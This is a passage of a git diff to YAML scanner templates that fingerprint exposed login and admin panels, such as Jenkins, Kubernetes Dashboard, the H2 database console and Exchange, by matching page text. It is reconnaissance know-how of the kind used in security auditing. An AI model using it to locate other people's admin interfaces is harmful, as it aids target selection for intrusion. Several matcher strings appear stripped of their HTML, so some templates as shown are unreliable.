+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ui/jobs"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Nomad"
+ - "nomad-ui"
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/exposed-pagespeed-global-admin.yaml b/exposed-panels/exposed-pagespeed-global-admin.yaml
index 827b030430..0ad8e055a4 100644
--- a/exposed-panels/exposed-pagespeed-global-admin.yaml
+++ b/exposed-panels/exposed-pagespeed-global-admin.yaml
@@ -2,8 +2,9 @@ id: exposed-pagespeed-global-admin
info:
name: Apache PageSpeed Global Admin Dashboard Exposure
- author: pd-team
+ author: pdteam
severity: medium
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/exposed-webalizer.yaml b/exposed-panels/exposed-webalizer.yaml
index e7cbd72b58..c94eb6e39d 100644
--- a/exposed-panels/exposed-webalizer.yaml
+++ b/exposed-panels/exposed-webalizer.yaml
@@ -2,8 +2,9 @@ id: exposed-webalizer
info:
name: Publicly exposed Webalizer Interface
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/f-secure-policy-manager.yaml b/exposed-panels/f-secure-policy-manager.yaml
new file mode 100644
index 0000000000..52a841605a
--- /dev/null
+++ b/exposed-panels/f-secure-policy-manager.yaml
@@ -0,0 +1,23 @@
+id: f-secure-policy-manager
+
+info:
+ name: F-Secure Policy Manager Server
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
+ tags: login,panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
F-Secure Policy Manager Server '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/faraday-login.yaml b/exposed-panels/faraday-login.yaml
new file mode 100644
index 0000000000..26856e1e03
--- /dev/null
+++ b/exposed-panels/faraday-login.yaml
@@ -0,0 +1,23 @@
+id: faraday-login
+
+info:
+ name: Faraday Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=html%3A%22faradayApp%22
+ tags: panel,faraday
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'ng-app="faradayApp">'
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/fastapi-docs.yaml b/exposed-panels/fastapi-docs.yaml
new file mode 100644
index 0000000000..e0925b7940
--- /dev/null
+++ b/exposed-panels/fastapi-docs.yaml
@@ -0,0 +1,22 @@
+id: fastapi-docs
+
+info:
+ name: FastAPI Docs
+ author: github.com/its0x08
+ severity: info
+ tags: fastapi,tech,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/docs"
+ - "{{BaseURL}}/redoc"
+ - "{{BaseURL}}/openapi.json"
+
+ matchers:
+ - type: word
+ words:
+ - "
FastAPI - Swagger UI "
+ - "
FastAPI - ReDoc "
+ - '{"title":"FastAPI"'
+ condition: or
diff --git a/exposed-panels/fiorilaunchpad-logon.yaml b/exposed-panels/fiorilaunchpad-logon.yaml
new file mode 100644
index 0000000000..36e57b30d6
--- /dev/null
+++ b/exposed-panels/fiorilaunchpad-logon.yaml
@@ -0,0 +1,24 @@
+id: fiorilaunchpad-logon
+
+info:
+ name: FioriLaunchpad Logon
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6793
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "
Logon "
+ - "fioriLogin"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/flink-exposure.yaml b/exposed-panels/flink-exposure.yaml
index e2a4c4cb21..3205841860 100644
--- a/exposed-panels/flink-exposure.yaml
+++ b/exposed-panels/flink-exposure.yaml
@@ -2,8 +2,9 @@ id: flink-exposure
info:
name: Apache Flink Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/fortinet-fortigate-panel.yaml b/exposed-panels/fortinet-fortigate-panel.yaml
index 4e3d8d8324..df08aa8d97 100644
--- a/exposed-panels/fortinet-fortigate-panel.yaml
+++ b/exposed-panels/fortinet-fortigate-panel.yaml
@@ -4,6 +4,7 @@ info:
name: Fortinet FortiGate SSL VPN Panel
author: bsysop
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/fortiweb-panel.yaml b/exposed-panels/fortiweb-panel.yaml
index 060b97d997..26e22e6e1f 100644
--- a/exposed-panels/fortiweb-panel.yaml
+++ b/exposed-panels/fortiweb-panel.yaml
@@ -4,6 +4,7 @@ info:
name: Fortinet FortiWeb Login Panel
author: PR3R00T
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/github-enterprise-detect.yaml b/exposed-panels/github-enterprise-detect.yaml
index bbe695dc06..bb831d7879 100644
--- a/exposed-panels/github-enterprise-detect.yaml
+++ b/exposed-panels/github-enterprise-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Github Enterprise
author: ehsahil
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml
index 5900c52769..43d1837456 100644
--- a/exposed-panels/gitlab-detect.yaml
+++ b/exposed-panels/gitlab-detect.yaml
@@ -4,19 +4,22 @@ info:
name: Detect Gitlab
author: ehsahil
severity: info
+ tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
- - "{{BaseURL}}/users/sign_up"
- - "{{BaseURL}}/explore"
redirects: true
max-redirects: 2
+ matchers-condition: and
matchers:
- type: word
words:
- - "GitLab"
- - "Register for GitLab"
- - "Explore GitLab"
+ - 'GitLab'
+ - 'https://about.gitlab.com'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/globalprotect-panel.yaml b/exposed-panels/globalprotect-panel.yaml
index a5ad944a04..6d6a03dfce 100644
--- a/exposed-panels/globalprotect-panel.yaml
+++ b/exposed-panels/globalprotect-panel.yaml
@@ -4,6 +4,7 @@ info:
name: PaloAlto Networks GlobalProtect Panel
author: organiccrap
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/glpi-authentication.yaml b/exposed-panels/glpi-authentication.yaml
new file mode 100644
index 0000000000..492a0df24e
--- /dev/null
+++ b/exposed-panels/glpi-authentication.yaml
@@ -0,0 +1,24 @@
+id: glpi-authentication
+
+info:
+ name: GLPI - Authentification
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22
+ tags: panel,auth
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
GLPI - Authentication '
+ - 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright'
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/glpi-login.yaml b/exposed-panels/glpi-login.yaml
new file mode 100644
index 0000000000..0c9a5af320
--- /dev/null
+++ b/exposed-panels/glpi-login.yaml
@@ -0,0 +1,21 @@
+id: glpi-login
+
+info:
+ name: GLPI - Аутентификация
+ author: dhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7002
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/glpi/'
+
+ matchers:
+ - type: word
+ words:
+ - '
GLPI - Аутентификация '
+ - 'GLPI Copyright'
+ condition: and
diff --git a/exposed-panels/go-anywhere-client.yaml b/exposed-panels/go-anywhere-client.yaml
index 065dc07c66..1aaa3fea26 100644
--- a/exposed-panels/go-anywhere-client.yaml
+++ b/exposed-panels/go-anywhere-client.yaml
@@ -4,6 +4,7 @@ info:
name: GoAnywhere client login detection
author: iamthefrogy
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/grafana-detect.yaml b/exposed-panels/grafana-detect.yaml
index 4f87f7ee36..f50d3e0abe 100644
--- a/exposed-panels/grafana-detect.yaml
+++ b/exposed-panels/grafana-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Grafana panel detect
author: organiccrap
severity: info
+ tags: panel
requests:
- method: GET
@@ -14,3 +15,9 @@ requests:
words:
- "
Grafana "
part: body
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Grafana ([v0-9.]+)'
diff --git a/exposed-panels/grails-database-admin-console.yaml b/exposed-panels/grails-database-admin-console.yaml
new file mode 100644
index 0000000000..f2ed34b32f
--- /dev/null
+++ b/exposed-panels/grails-database-admin-console.yaml
@@ -0,0 +1,19 @@
+id: grails-database-admin-console
+
+info:
+ name: Grails database admin console
+ author: emadshanab
+ severity: medium
+ tags: grails,panel
+ reference: https://www.acunetix.com/vulnerabilities/web/grails-database-console/
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/dbconsole/'
+ - '{{BaseURL}}/h2-console/'
+
+ matchers:
+ - type: word
+ words:
+ - "
H2 Console "
diff --git a/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml
new file mode 100644
index 0000000000..c4cb4ac680
--- /dev/null
+++ b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml
@@ -0,0 +1,23 @@
+id: gxd5-pacs-connexion-utilisateur
+
+info:
+ name: GXD5 Pacs Connexion utilisateur
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22
+ tags: panel,login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
GXD5 Pacs Connexion utilisateur '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/hadoop-exposure.yaml b/exposed-panels/hadoop-exposure.yaml
index 83df2717f3..c5b65f05fc 100644
--- a/exposed-panels/hadoop-exposure.yaml
+++ b/exposed-panels/hadoop-exposure.yaml
@@ -2,8 +2,9 @@ id: hadoop-exposure
info:
name: Apache Hadoop Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/hivemanager-login-panel.yaml b/exposed-panels/hivemanager-login-panel.yaml
new file mode 100644
index 0000000000..a4da86dd2b
--- /dev/null
+++ b/exposed-panels/hivemanager-login-panel.yaml
@@ -0,0 +1,19 @@
+id: hivemanager-login-panel
+info:
+ name: HiveManager Login panel
+ author: binaryfigments
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/hm/login.action'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "HiveManager Login"
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml
new file mode 100644
index 0000000000..af21dfa464
--- /dev/null
+++ b/exposed-panels/hmc-hybris-panel.yaml
@@ -0,0 +1,19 @@
+id: hmc-hybris-panel
+
+info:
+ name: SAP Hybris Management Console
+ author: dogasantos
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/hmc/hybris"
+ - "{{BaseURL}}/hybris/hmc/hybris"
+
+ matchers:
+ - type: word
+ words:
+ - "hybris Management Console"
+ part: body
diff --git a/exposed-panels/icinga-web-login.yaml b/exposed-panels/icinga-web-login.yaml
new file mode 100644
index 0000000000..42aa467bb0
--- /dev/null
+++ b/exposed-panels/icinga-web-login.yaml
@@ -0,0 +1,22 @@
+id: icinga-web-login
+
+info:
+ name: Icinga Web 2 Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/authentication/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "
Icinga Web 2 Login "
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/identity-services-engine.yaml b/exposed-panels/identity-services-engine.yaml
new file mode 100644
index 0000000000..5699d13914
--- /dev/null
+++ b/exposed-panels/identity-services-engine.yaml
@@ -0,0 +1,20 @@
+id: identity-services-engine
+
+info:
+ name: Identity Services Engine
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/admin/'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
Identity Services Engine '
diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml
index 771b21408a..afca78d8fd 100644
--- a/exposed-panels/identityguard-selfservice-entrust.yaml
+++ b/exposed-panels/identityguard-selfservice-entrust.yaml
@@ -4,6 +4,7 @@ info:
name: IdentityGuard Self-Service by Entrust
author: nodauf
severity: info
+ tags: panel
requests:
- method: GET
@@ -11,6 +12,7 @@ requests:
- "{{BaseURL}}/IdentityGuardSelfService/"
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
+ req-condition: true
redirects: true
max-redirects: 2
matchers:
diff --git a/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml b/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml
index e240ed43ff..3a5b72b76f 100644
--- a/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml
+++ b/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml
@@ -1,9 +1,10 @@
-id: iomega-lenovo-emc-shared-nas.yaml
+id: iomega-lenovo-emc-shared-nas
info:
name: Iomega Lenovo EMC with shared NAS
author: e_schultze_
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/iptime-router.yaml b/exposed-panels/iptime-router.yaml
new file mode 100644
index 0000000000..b11cf83bae
--- /dev/null
+++ b/exposed-panels/iptime-router.yaml
@@ -0,0 +1,30 @@
+id: iptime-router
+
+info:
+ name: ipTIME Router Login
+ author: gy741
+ severity: info
+ reference: http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html
+ tags: panel,login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/sess-bin/login_session.cgi'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ -
ipTIME ([A-Z0-9_-]+)<\/TITLE>
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ipTIME ([A-Z0-9_-]+)<\/TITLE>
\ No newline at end of file
diff --git a/exposed-panels/itop-panel.yaml b/exposed-panels/itop-panel.yaml
new file mode 100644
index 0000000000..367b274f54
--- /dev/null
+++ b/exposed-panels/itop-panel.yaml
@@ -0,0 +1,27 @@
+id: itop-panel
+
+info:
+ name: iTop Instance Detection Template
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a Combodo iTop instance via the login page
+ tags: panel,itop
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pages/UI.php"
+ - "{{BaseURL}}/simple/pages/UI.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Welcome to iTop"
+ - "iTop login"
+ part: body
+ condition: or
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/jenkins-api-panel.yaml b/exposed-panels/jenkins-api-panel.yaml
new file mode 100644
index 0000000000..e99421b55c
--- /dev/null
+++ b/exposed-panels/jenkins-api-panel.yaml
@@ -0,0 +1,23 @@
+id: jenkins-api-panel
+
+info:
+ name: Jenkins API Instance Detection Template
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint
+ tags: panel,api,jenkins
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/xml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "hudson.model.Hudson"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/jenkins-login.yaml b/exposed-panels/jenkins-login.yaml
new file mode 100644
index 0000000000..b13aa5b4b0
--- /dev/null
+++ b/exposed-panels/jenkins-login.yaml
@@ -0,0 +1,21 @@
+id: jenkins-login
+
+info:
+ name: Jenkins Login
+ author: pdteam
+ severity: info
+ tags: panel,jenkins
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Sign in [Jenkins]'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/jfrog.yaml b/exposed-panels/jfrog.yaml
new file mode 100644
index 0000000000..be15c7fbd8
--- /dev/null
+++ b/exposed-panels/jfrog.yaml
@@ -0,0 +1,22 @@
+id: jfrog-login
+
+info:
+ name: JFrog Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6797
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ui/login/'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'JFrog '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/jira-detect.yaml b/exposed-panels/jira-detect.yaml
index bf8fffad86..0e5cbb35d5 100644
--- a/exposed-panels/jira-detect.yaml
+++ b/exposed-panels/jira-detect.yaml
@@ -2,8 +2,9 @@ id: jira-detect
info:
name: Detect Jira Issue Management Software
- author: pdteam
+ author: pdteam,philippedelteil
severity: info
+ tags: panel,jira
requests:
- method: GET
@@ -18,3 +19,10 @@ requests:
- type: word
words:
- "Project Management Software"
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'title="JiraVersion" value="([0-9.]+)'
diff --git a/exposed-panels/jmx-console.yaml b/exposed-panels/jmx-console.yaml
index 3aeb44f97c..81893c03f8 100644
--- a/exposed-panels/jmx-console.yaml
+++ b/exposed-panels/jmx-console.yaml
@@ -1,8 +1,9 @@
id: jmx-console
info:
name: JMX Console
- author: Yash Anand @yashanand155
+ author: yashanand155
severity: low
+ tags: panel,jmx
requests:
- method: GET
diff --git a/exposed-panels/joomla-panel.yaml b/exposed-panels/joomla-panel.yaml
new file mode 100644
index 0000000000..bef3cb248d
--- /dev/null
+++ b/exposed-panels/joomla-panel.yaml
@@ -0,0 +1,18 @@
+id: joomla-panel
+
+info:
+ name: Joomla Panel
+ author: its0x08
+ severity: info
+ tags: panel,joomla
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/administrator/"
+ matchers:
+ - type: word
+ words:
+ - ' '
+ - '/administrator/templates/isis/images/joomla.png'
+ condition: or
diff --git a/exposed-panels/kafka-connect-ui.yaml b/exposed-panels/kafka-connect-ui.yaml
index a3a54516fa..7eeab84fb6 100644
--- a/exposed-panels/kafka-connect-ui.yaml
+++ b/exposed-panels/kafka-connect-ui.yaml
@@ -2,8 +2,9 @@ id: kafka-connect-ui
info:
name: Apache Kafka Connect UI Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel,kafka
requests:
- method: GET
diff --git a/exposed-panels/kafka-monitoring.yaml b/exposed-panels/kafka-monitoring.yaml
index 3468f21397..d7d75e2c47 100644
--- a/exposed-panels/kafka-monitoring.yaml
+++ b/exposed-panels/kafka-monitoring.yaml
@@ -2,8 +2,9 @@ id: kafka-monitoring
info:
name: Apache Kafka Monitor Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel,kafka
requests:
- method: GET
diff --git a/exposed-panels/kafka-topics-ui.yaml b/exposed-panels/kafka-topics-ui.yaml
index d54d091f33..9b4fc715ae 100644
--- a/exposed-panels/kafka-topics-ui.yaml
+++ b/exposed-panels/kafka-topics-ui.yaml
@@ -2,8 +2,9 @@ id: kafka-topics-ui
info:
name: Apache Kafka Topics UI Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel,kafka
requests:
- method: GET
diff --git a/exposed-panels/keenetic-web-login.yaml b/exposed-panels/keenetic-web-login.yaml
new file mode 100644
index 0000000000..bc9aba324b
--- /dev/null
+++ b/exposed-panels/keenetic-web-login.yaml
@@ -0,0 +1,22 @@
+id: keenetic-web-login
+
+info:
+ name: Keenetic Web Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6817
+ tags: panel,keenetic
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login#goto=%2Fdashboard'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Keenetic Web '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml
index 67f08a2e2d..a927762b28 100644
--- a/exposed-panels/key-cloak-admin-panel.yaml
+++ b/exposed-panels/key-cloak-admin-panel.yaml
@@ -2,16 +2,23 @@ id: key-cloak-admin-panel
info:
name: Keycloak Admin Panel
- author: incogbyte
- severity: low
+ author: incogbyte,righettod
+ severity: info
+ tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/auth/admin/master/console/"
+ - "{{BaseURL}}/auth/admin"
+ redirects: true
+ max-redirects: 2
matchers:
+
- type: word
words:
- ""
- part: body
\ No newline at end of file
+ - "keycloak"
+ part: body
+ condition: or
\ No newline at end of file
diff --git a/exposed-panels/kronos-workforce-central.yaml b/exposed-panels/kronos-workforce-central.yaml
new file mode 100644
index 0000000000..8dc3810292
--- /dev/null
+++ b/exposed-panels/kronos-workforce-central.yaml
@@ -0,0 +1,17 @@
+id: kronos-workforce-central
+
+info:
+ name: Kronos Workforce Central Panel
+ author: emadshanab
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wfc/portal'
+
+ matchers:
+ - type: word
+ words:
+ - 'Kronos Workforce Central'
\ No newline at end of file
diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml
index 1aa0892365..ac7cfb461e 100644
--- a/exposed-panels/kubernetes-dashboard.yaml
+++ b/exposed-panels/kubernetes-dashboard.yaml
@@ -2,8 +2,9 @@ id: kubernetes-dashboard
info:
name: Kubernetes Console Exposure
- author: pd-team
+ author: pdteam
severity: low
+ tags: panel,kubernetes,devops
requests:
- method: GET
@@ -12,4 +13,4 @@ requests:
matchers:
- type: word
words:
- - "Kubernetes Dashboard "
\ No newline at end of file
+ - "Kubernetes Dashboard "
diff --git a/exposed-panels/labtech-panel.yaml b/exposed-panels/labtech-panel.yaml
new file mode 100644
index 0000000000..56c81772a1
--- /dev/null
+++ b/exposed-panels/labtech-panel.yaml
@@ -0,0 +1,31 @@
+id: labtech-panel
+
+info:
+ name: LabTech Web Portal
+ author: deFr0ggy, @github.com/deFr0ggy
+ severity: info
+ tags: panel,labtech
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/WCC2/"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "
LabTech "
+ - '
"
+ condition: and
diff --git a/exposed-panels/livezilla-login-panel.yaml b/exposed-panels/livezilla-login-panel.yaml
new file mode 100644
index 0000000000..4f5e04c1cd
--- /dev/null
+++ b/exposed-panels/livezilla-login-panel.yaml
@@ -0,0 +1,22 @@
+id: livezilla-login-panel
+
+info:
+ name: Livezilla login detect
+ author: __Fazal
+ severity: info
+ tags: panel,livezilla
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/mobile/index.php'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'LiveZilla'
\ No newline at end of file
diff --git a/exposed-panels/lucee-login.yaml b/exposed-panels/lucee-login.yaml
new file mode 100644
index 0000000000..6eb66727ff
--- /dev/null
+++ b/exposed-panels/lucee-login.yaml
@@ -0,0 +1,24 @@
+id: lucee-login
+
+info:
+ name: Lucee Web/Server Administrator Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22
+ tags: panel,lucee
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/lucee/admin/web.cfm'
+ - '{{BaseURL}}/lucee/admin/server.cfm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Login - Lucee Web Administrator '
+ - 'Login - Lucee Server Administrator '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/luci-login-detection.yaml b/exposed-panels/luci-login-detection.yaml
new file mode 100644
index 0000000000..0824c5021a
--- /dev/null
+++ b/exposed-panels/luci-login-detection.yaml
@@ -0,0 +1,23 @@
+id: luci-login-detection
+
+info:
+ name: LuCi Login Detector
+ author: aashiq
+ severity: info
+ description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint
+ tags: login
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/luci"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Authorization Required"
diff --git a/exposed-panels/magento-admin-panel.yaml b/exposed-panels/magento-admin-panel.yaml
new file mode 100644
index 0000000000..ba964e2efb
--- /dev/null
+++ b/exposed-panels/magento-admin-panel.yaml
@@ -0,0 +1,25 @@
+id: magento-admin-panel
+
+info:
+ name: Exposed Magento Admin Panel
+ author: TechbrunchFR
+ severity: info
+ description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
+ reference: https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
+ tags: magento,panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+
+ - type: word
+ words:
+ - "/admin/index/index/key/"
+ part: header
\ No newline at end of file
diff --git a/exposed-panels/manage-engine-admanager-panel.yaml b/exposed-panels/manage-engine-admanager-panel.yaml
index d4d80647e8..62ca19c347 100644
--- a/exposed-panels/manage-engine-admanager-panel.yaml
+++ b/exposed-panels/manage-engine-admanager-panel.yaml
@@ -4,6 +4,7 @@ info:
name: Manage Engine ADManager Panel
author: PR3R00T
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/mantis-detect.yaml b/exposed-panels/mantis-detect.yaml
new file mode 100644
index 0000000000..eee362e684
--- /dev/null
+++ b/exposed-panels/mantis-detect.yaml
@@ -0,0 +1,18 @@
+id: mantis-detect
+
+info:
+ name: Mantis portal detection
+ author: makyotox
+ severity: info
+ tags: panel,mantis
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login_page.php"
+
+ matchers:
+ - type: word
+ words:
+ - "MantisBT "
+ part: body
diff --git a/exposed-panels/microsoft-exchange-control-panel.yaml b/exposed-panels/microsoft-exchange-control-panel.yaml
new file mode 100644
index 0000000000..5aa1d49d68
--- /dev/null
+++ b/exposed-panels/microsoft-exchange-control-panel.yaml
@@ -0,0 +1,24 @@
+id: microsoft-exchange-control-panel
+
+info:
+ name: Microsoft Exchange Control Panel
+ author: r3dg33k
+ severity: info
+ description: Publicly accessible Microsoft Exchange Server Control Panel
+ tags: microsoft,panel
+ reference: https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/owa/auth/logon.aspx?replaceCurrent=1&url={{BaseURL}}/ecp"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'Exchange Admin Center'
\ No newline at end of file
diff --git a/exposed-panels/microsoft-exchange-login.yaml b/exposed-panels/microsoft-exchange-login.yaml
new file mode 100644
index 0000000000..1ba8607ba6
--- /dev/null
+++ b/exposed-panels/microsoft-exchange-login.yaml
@@ -0,0 +1,23 @@
+id: exchange-login
+
+info:
+ name: Microsoft Exchange login page
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6739
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/owa/auth/logon.aspx'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Exchange Log In '
+ - 'Microsoft Exchange - Outlook Web Access '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik-routeros.yaml
new file mode 100644
index 0000000000..93481765df
--- /dev/null
+++ b/exposed-panels/mikrotik-routeros.yaml
@@ -0,0 +1,24 @@
+id: mikrotik-routeros
+
+info:
+ name: MikroTik RouterOS Login
+ author: gy741
+ severity: info
+ reference: https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe
+ tags: panel,login
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'If this device is not in your possession, please contact your local network administrator'
+ - '.mikrotik.com'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/mini-start-page.yaml b/exposed-panels/mini-start-page.yaml
new file mode 100644
index 0000000000..e44521550f
--- /dev/null
+++ b/exposed-panels/mini-start-page.yaml
@@ -0,0 +1,23 @@
+id: mini-start-page
+
+info:
+ name: Miniweb Start Page
+ author: dhiyaneshDk
+ severity: info
